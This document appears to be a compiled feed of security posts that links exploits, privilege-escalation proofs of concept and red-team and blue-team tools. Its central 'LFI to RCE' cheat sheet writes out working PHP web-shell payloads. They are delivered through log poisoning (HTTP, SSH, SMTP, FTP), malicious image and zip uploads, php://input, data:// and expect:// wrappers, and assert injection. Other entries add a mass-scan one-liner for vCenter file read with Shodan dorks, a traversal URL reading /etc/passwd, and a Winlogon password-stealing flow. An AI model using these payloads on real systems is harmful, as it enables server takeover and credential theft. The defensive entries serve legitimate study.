4-ZERO-3

Tool to bypass 403/401. This script contain all the possible techniques to do the same.

https://github.com/Dheerajmadhukar/4-ZERO-3

#forbidden #bypass #bugbounty

Hunting for Persistence in Linux

# https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/

# https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/

#blueteam #redteam #DFIR #security

EfsPotato

MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability

https://github.com/zcgonvh/EfsPotato

#potato #seImpersonateprivilege #lpe

CVE-2021-43267 — Linux TIPC (PoC)

An article on how to escalate privileges via the slab-buffer-overflow in the Transparent Inter-Process Communication (TIPC) module.

Reference:
https://haxx.in/posts/pwning-tipc/

PoC:
https://github.com/ohnonoyesyes/CVE-2021-43267

#poc #cve #linux #lpe

Achieving LFI to RCE

1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

2. SSH Log Poisoning

ssh '<?php system($_GET['c'])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls

3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:<test@example.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls

4. Image Upload

exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
/show.php?file=../img.jpg&c=ls

5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

6. php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding

7. Zip upload

echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php

8. data://text/plain

/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=

9. /proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}

10. expect://

/show.php?page=expect://ls

11. input://

POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>

12. RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '

13. Log files

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)

14. Via PHP sessions

https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

15. Via SSH

If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa

16. vsftpd Log Poisoning

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log

17. Automation

https://github.com/D35m0nd142/LFISuite

#lfi #rce #cheatsheet

WindowsMDMLPE — CVE-2021-24084

# https://github.com/ohnonoyesyes/CVE-2021-24084

# https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html

#mdm #lpe #cve

Winlogon Password Leaking

The flow is:
— user enters password
— winlogon loads mpnotify.exe
— mpnotify opens RPC channel
— winlogon sends pass via RPC
— mpnotify forwards to DLL
— DLL stores it on disk

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

#winlogon #password #leak #redteam

DetectionLabELK

DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.

https://github.com/cyberdefenders/DetectionLabELK

#blueteam #detection #elk #lab

COM Objects P.1: The Hidden Backdoor in Your System

A deeper dive into COM objects: how to utilize them in redteam engagements, and how to detect and protect organizations from them if you are on the blueteam side.

https://medium.com/maltrak/com-objects-p-1-the-hidden-backdoor-in-your-system-947ac4285e85

#com #backdoor #redteam #blueteam

How Windows Stops Kerberos Usernames Being Case Sensitive

https://vbscrub.com/2021/11/29/how-windows-stops-kerberos-usernames-being-case-sensitive/

#kerberos #pre_auth #aes_salt

ManageEngine ADSelfService Plus — Authentication Bypass (CVE-2021-40539)

Details:
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html

Exploit:
https://github.com/synacktiv/CVE-2021-40539

#adselfservice #cve #auth #bypass

CHAPS — Configuration Hardening Assessment PowerShell Script

CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment.

https://github.com/cutaway-security/chaps

#powershell #hardening #assessment #blueteam

Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)

https://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../

Details:
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/

#spring #actuator #cve #bugbounty

VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Shodan Dorks:
http.title:"ID_VC_Welcome"

Zoomeye Dorks:
app:"VMware vCenter"

https://github.com/l0ggg/VMware_vCenter

#vmware #vcenter #bugbounty

Webapp Wordlists

This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

https://github.com/p0dalirius/webapp-wordlists

#wordlist #cms #bugbounty

OffensiveNim — PowerShell

Using Nim to load the CLR and execute PowerShell without the need for PowerShell.exe, now with printing the output as well!

https://github.com/Alh4zr3d/OffensiveNim/blob/master/src/execute_powershell_bin.nim

#offensive #nim #powershell

Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver (CVE-2021-42008)

CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access.

https://syst3mfailure.io/sixpack-slab-out-of-bounds

#linux #6pack #lpe #cve

KeyHacks

Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.

https://github.com/streaak/keyhacks

#api #key #check #bugbounty

jq + grep + fzf + curl = SharpCollection

https://github.com/Flangvik/SharpCollection

alias SharpCollection='print -z `curl -sSL "https://api.github.com/repos/Flangvik/SharpCollection/git/trees/master?recursive=1" | jq -r ".tree[].path" | grep \\.exe | while read line; do echo "curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/$line >"; done | fzf --tac`'

#csharp #collection #tooling